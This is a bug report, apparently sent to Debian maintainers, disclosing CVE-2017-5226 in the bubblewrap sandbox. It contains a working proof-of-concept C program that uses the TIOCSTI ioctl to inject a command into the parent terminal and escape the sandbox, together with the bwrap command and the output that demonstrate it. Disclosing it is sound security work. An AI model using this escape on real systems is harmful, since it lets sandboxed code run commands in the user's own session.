Source: bubblewrap
Version: All
Severity: grave
Hi,
When executing a program via the bubblewrap sandbox, the nonpriv
session can escape to the parent session by using the TIOCSTI ioctl to
push characters into the terminal's input buffer, allowing an attacker
to escape the sandbox.
This has been assigned CVE-2017-5226.
$ cat test.c
#include <unistd.h>
#include <sys/ioctl.h>
#include <termios.h>
int main()
{
char *cmd = "id\n";
while(*cmd)
ioctl(0, TIOCSTI, cmd++);
execlp("/bin/id", "id", NULL);
}
$ gcc test.c -o /tmp/test
$ bwrap --ro-bind /lib64 /lib64 --ro-bind /home /home --ro-bind /bin
/bin --ro-bind /tmp /tmp --chdir / --unshare-pid --uid 0 /tmp/test
id
uid=0 gid=1000 groups=1000
$ id <------ did not type this
uid=1000(saken) gid=1000(saken) groups=1000(saken)
Thanks,
Federico Bento.
----------------------------------------------------------------
This message was sent using IMP, the Internet Messaging Program.
